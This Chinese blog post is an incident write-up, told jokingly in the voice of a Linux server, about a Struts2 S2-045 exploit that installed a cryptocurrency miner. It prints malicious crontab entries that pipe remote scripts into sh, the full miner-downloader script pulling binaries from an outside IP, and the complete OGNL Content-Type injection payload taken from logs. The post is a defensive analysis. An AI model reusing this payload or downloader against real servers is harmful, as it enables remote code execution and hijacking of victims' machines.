我竟然被抓去做了比特幣挖礦工
引言
世界上還是牛人多,在2011年的時候,一名大三的學生有了困擾,隨後上知乎發布了一個提問大三學生手頭有6000元,有什麽好的理財投資建議?在2017年的今天,上到了知乎熱門提問,因為在提問下面有一個獲得上萬點贊的回答買“比特幣,保存好錢包文件,然後忘掉你有過6000元這回事,五年後再看看。
起因
我是一個服務器,並且還是一個內網的Linux服務器,外面武裝了天清漢馬防火墻,內部有firewall,強大的密碼組合,甚至自己都記不清到底幾位數,這幾年我甚是悠閑,悠閑的感覺自己有點混日子,然就是這樣一個與世無爭的我還是被無情的攻擊了。
那天清晨,感覺大腦有點發燒,趕緊發出一條top指令:
top - 20:07:49 up 70 days, 8:53, 2 users, load average: 5.71, 5.07, 2.93Tasks: 200 total, 1 running, 199 sleeping, 0 stopped, 0 zombie%Cpu(s): 50.2 us, 0.1 sy, 0.0 ni, 49.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 stKiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cacheKiB Swap: 32834556 total, 32803700 free, 30856 used. 51442368 avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND17257 root 20 0 591340 15220 556 S 599.7 0.0 67:13.74 atd15768 root 20 0 15.369g 2.319g 18048 S 1.7 3.7 4:10.49 java
發現了一條詭異的進程atd,CPU占用居然將近600%,執行命令ps -eaf|grep atd:
[[email protected] tmp]# ps -ef|grep atdroot 17257 1 99 19:56 ? 01:22:31 ./atd -c trtgsasefd.conf -t 6root 17475 17165 0 20:10 pts/0 00:00:00 grep --color=auto atd
緊接著find / -name atd查找相關指令存放地點。
[[email protected] tmp]# find / -name atd/var/tmp/atd
突然覺得還是先把這個atd進程殺掉為好,kill -9 17257,立即馬上迅速強行殺死。
隨後退燒了,但可惡的是,不到幾分鐘,又燒了,一看又是atd這個進程在運行。
殺掉後重新運行,一定是在某個地方有定時,檢查了一下定時任務,crontab -l:
[[email protected] tmp]# crontab -l*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh*/19 * * * * curl http://5.188.87.11/icons/logo.jpg|sh
擦,以前的定時腳本不見了,多了兩條奇怪的任務,裏面有個網址很特別,復制到瀏覽器訪問,本以為是個美女或者驚悚圖,結果是個大黑圖,F12圖片網絡請求發現Response中居然存在如下代碼:
#!/bin/shrm -rf /var/tmp/bmsnxvpggm.confps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk ‘{print $2}‘|xargs kill -9ps auxf|grep -v grep|grep "\./"|grep ‘httpd.conf‘|awk ‘{print $2}‘|xargs kill -9ps auxf|grep -v grep|grep "\-p x"|awk ‘{print $2}‘|xargs kill -9ps auxf|grep -v grep|grep "stratum"|awk ‘{print $2}‘|xargs kill -9ps auxf|grep -v grep|grep "cryptonight"|awk ‘{print $2}‘|xargs kill -9ps auxf|grep -v grep|grep "bmsnxvpggm"|awk ‘{print $2}‘|xargs kill -9ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grepif [ $? -ne 0 ]thenecho "start process....."chmod 777 /var/tmp/trtgsasefd.confrm -rf /var/tmp/trtgsasefd.confcurl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.confwget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.confchmod 777 /var/tmp/atdrm -rf /var/tmp/atdrm -rf /var/tmp/sshdcat /proc/cpuinfo|grep aes>/dev/nullif [ $? -ne 1 ]thencurl -o /var/tmp/atd http://5.188.87.11/icons/kworkerwget -O /var/tmp/atd http://5.188.87.11/icons/kworkerelsecurl -o /var/tmp/atd http://5.188.87.11/icons/kworker_nawget -O /var/tmp/atd http://5.188.87.11/icons/kworker_nafichmod +x /var/tmp/atdcd /var/tmpproc=`grep -c ^processor /proc/cpuinfo`cores=$((($proc+1)/2))nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &elseecho "runing....."fi
一坨腳本,狗日的 居然有 rm -rf 這是要要了老子的命啊!!! 嚇大趕緊打開藍燈谷歌搜索這個命令,在virustotal找到以下說明:
同時發現了一條四天前的評論,這是一個腳本,通過struts漏洞傳播下載和啟動一個bitcode礦工。
在gov.lk中也發現了有一坨代碼,隱約發現與struts2有關:
由於一些老舊項目還在使用struts2,於是查詢了一下相關日誌,居然發現了傳說中的OGNL註入
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn‘t contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘echo "*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n*/19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh‘).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
黑客攻擊者通過使用一個表單來發送一些內容到struts請求,該內容被OGNL解析,結果創建了crontab,擦,真是耳聞不如一見啊,也有中招的那一天,就這樣我變成了一個苦逼的挖礦工。
挖礦組織
Struts2的安全漏洞從2010年開始陸續被披露存在遠程代碼執行漏洞,從2010年的S2-005、S2-009、S2-013 S2-016、S2-019、S2-020、S2-032、S2-037、devMode、及2017年3月初Struts2披露的S045漏洞,每一次的漏洞爆發隨後互聯網都會出現Struts2掃描攻擊活動。
此次攻擊針對Struts2的遠程命令執行漏洞,漏洞編號:S2-045,CVE編號:CVE-2017-5638,官方評級為高危,該漏洞是由於在使用基於Jakarta插件的文件上傳功能條件下,惡意用戶可以通過修改HTTP請求頭中的Content-Type值來觸發該漏洞,黑客通過批量對互聯網的WEB應用服務器發起攻擊,並下載惡意腳本執行下載進行比特幣挖礦程序,主要感染Linux服務器。
經檢測和搜索,這應該是一個有組織有紀律的挖礦集團,以下是IP地址來源,萬惡的蘇修主義啊,真是亡我天朝之心不死。
解決方案
Struts2升級版本至2.5.10,高危漏洞又來了,這是三月份的一篇升級,當時投機的還是趕緊升了吧,如果實在不想升級,無所謂反正是挖礦,不會破壞你什麽。
但是,如果不挖礦呢,那就傻逼了?到時候就不是發燒那麽簡單了,很多公司上線部署都不是很規範,可能所有的程序都用root啟動也說不定呢?
如何註入
最後感覺這才是大家比較關註的問題,肯定有不少小夥伴想知道黑客是怎麽註入的吧?
人們都說,只要心夠誠,就能在西邊疙瘩山上尋得一當鋪,進去,便能改變你的一生,其實我也不知道。
本文出自 “海岸無眠” 博客,請務必保留此出處http://itstyle.blog.51cto.com/2205083/1969255
我竟然被抓去做了比特幣挖礦工